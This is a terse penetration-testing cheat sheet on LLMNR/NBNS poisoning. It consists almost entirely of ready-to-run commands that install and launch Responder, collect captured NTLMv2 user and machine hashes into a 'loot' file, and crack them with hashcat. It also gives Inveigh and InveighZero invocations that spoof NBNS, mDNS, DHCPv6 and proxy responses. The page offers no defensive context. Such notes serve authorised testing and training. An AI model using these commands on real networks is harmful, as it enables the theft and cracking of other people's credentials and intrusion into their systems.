LLMNR / NBNS Poisoning

Link-Local Multicast Name Resolution / NetBIOS Name Service

Responder

Install:

$ git clone https://github.com/lgandx/Responder ~/tools/Responder && cd ~/tools/Responder

Run:

$ sudo ./Responder.py -I eth0 -Av
$ sudo ./Responder.py -I eth0 -wd -P -v

Parse, sort and save hashes:

# Users
$ cat logs/*.txt | grep -a . | grep -a -v -e 'logs/' -e '\$' | sort -u -t: -k1,1 > net-ntlmv2.responder
$ sort -u -t: -k1,1 net-ntlmv2.responder ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.responder

# Machines
$ cat logs/*.txt | grep -a '\$' | sort -u -t: -k1,1

Monitor new hashes:

$ sudo inotifywait -rm /usr/share/responder/logs | grep NTLMv1

Crack:

$ hashcat -m 5600 -O -a 0 -w 3 --session=netntlmv2 -o net-ntlmv2.out net-ntlmv2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

Inveigh

PS > Invoke-Inveigh [-IP '10.10.13.37'] -ConsoleOutput Y -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y

InveighZero

PS > .\InveighZero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N]

Last updated